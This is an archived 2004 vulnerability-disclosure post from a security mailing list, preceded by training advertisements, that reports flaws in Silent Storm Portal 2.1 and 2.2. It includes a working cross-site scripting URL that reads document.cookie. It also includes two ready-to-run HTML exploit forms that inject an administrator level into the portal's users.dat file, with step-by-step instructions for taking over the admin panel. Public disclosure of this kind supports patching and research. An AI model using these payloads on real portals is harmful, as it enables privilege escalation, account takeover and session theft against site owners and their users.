Ethical Hacking

Learn to find vulnerabilities before the bad guys do! Gain real world hands on hacking experience in our state of the art hacking lab. Course designed and taught by expert instructors with years of penetration testing experience. 12 student maximum in every class. Certification attempt included in every package.
Computer Forensics Training at InfoSec Institute

Gain the in-demand skills of a certified computer examiner, learn to recover trace data left behind by fraud, theft, and cybercrime perpetrators. Discover the source of computer crime and abuse at your organization so that it never happens again. All of our class sizes are guaranteed to be 12 students or less to facilitate one-on-one interaction with one of our expert instructors.




Network Security Vuln-Dev
[Top] [All Lists]
<prev [Date] next>
[Advanced]
 <prev [Thread] next>

Multiple Vulnerabilities in Silent Storm Portal

from [R00tCr4ck] Network Security [Permanent Link]
Subject: Multiple Vulnerabilities in Silent Storm Portal
Date: 30 Sep 2004 11:57:54 -0000 


#####################################
# CHT Security Research-2004        #
# http://www.CyberSpy.Org           #
# Turkey                            #
#####################################

Software:
Silent Storm Portal

Web Site:
http://www.silent-storm.co.uk/ssp/

Affected Version(s):
2.1,2.2

Description:
Silent Storm Portal is a PHP based portal system.It requires PHP4 or above.no 
MySQL needed.

Multiple Vulnerabilities in Silent Storm Portal:

Cross-Site Scripting vulnerability : 

Silent Storm Portal is prone to cross-site scripting attacks. It is possible to 
construct a link containing arbitrary script code to a website running Silent 
Storm Portal . When a user browses the link, the script code will be executed 
on the user in the context of the site using the Portal.The impact of this 
issue is that the attacker is able to hijack a legitimate web user's session, 
by stealing cookie-based authentication credentials.

Demonstration:

http://www.victim.com/index.php?module=%3Cscript%20language=javascript%3Ewindow.alert%28document.cookie%29;%3C/script%3E


Unauthorized Administrative Access Vulnerability :

Silent Storm Portal stores all account informations,usernames and passwords in 
the users.dat file.This file is a plaintext file stored in the db 
directory.There is a flaw in profile.php file which could allow normal members 
to gain escalated privileges.The issue occurs due to insufficient sanitization 
of user-supplied data that may allow escape character sequences to be injected 
into the users.dat file.Submitting an e-mail address with an evil level code 
via profile module will inject Administrator level value into the database file 
and will escalate the current level to Administrator privileges.

Demonstration:

Register a user account then login and run the exploit.html

---exploit.html----
<form method="post" 
action="http://www.victim.com/index.php?module=../../profile";>
<input type="text" name="mail" value="any@mail.com"><br>
<input type="hidden" name="mail" value="<~>1<~>">
<input type="submit" name="post" value="Get Admin!">
</form>
---/exploit.html---

That's All!
What Happened?
The 3rd line of exploit.html injected Administrator level "1" into the database 
file.
( 1: Administrator,2: is Normal User. )

examples from the database file:

before exploiting:

evilaccount<~>password<~>any@mail.com<~>2<~><~><~><~><~>
                                      Level
                                   Normal User
after exploiting:

evilaccount<~>password<~>any@mail.com<~>1<~><~>2<~><~><~><~><~><~><~>
                                 Injected Level
                                  Administrator

You'll get "Updated Your Profile Sucessfuly !" message after executing the 
exploit.html
That's All! logout and re-login with your username/password.
click to "Admin Panel" link. ( index.php?module=../../apanel )
Now you have full Administrator privileges.

Here is another code that creates an Administrator account directly on the 
victim's portal:

---exploit2.html----
<form method="post" action="http://www.victim.com/index.php?module=../../Home";>
User:<input type="text" name="usr" size="10"><br>
Pass:<input type="password" name="pas" size="10"><br>
<input type=hidden name="ema" value="any@mail.com<~>1<~>"><br>
<input type="submit" name="reg" value="Create Admin!">
</form>
---/exploit2.html---

----------------------------
The original article can be found at: 
http://www.CyberSpy.Org
(Turkish Language)
[More with this subject...]




<Prev in Thread] Current Thread [Next in Thread>
  • Multiple Vulnerabilities in Silent Storm Portal, R00tCr4ck <=
Previous by Date:  Re: Diebold Global Election Management System (GEMS) Backdoor Account Allows Authenticated Users to Modify Votes, David F. Skoll
Next by Date:  [Full-Disclosure] Multiple vulnerabilities in w-agora forum, Alexander Antipov
Previous by Thread:  TSL-2004-0050 - multi, Trustix Security Advisor
Next by Thread:  Unicornscan 0.4.2, robert
Indexes:  [Date] [Thread] [Top] [All Lists]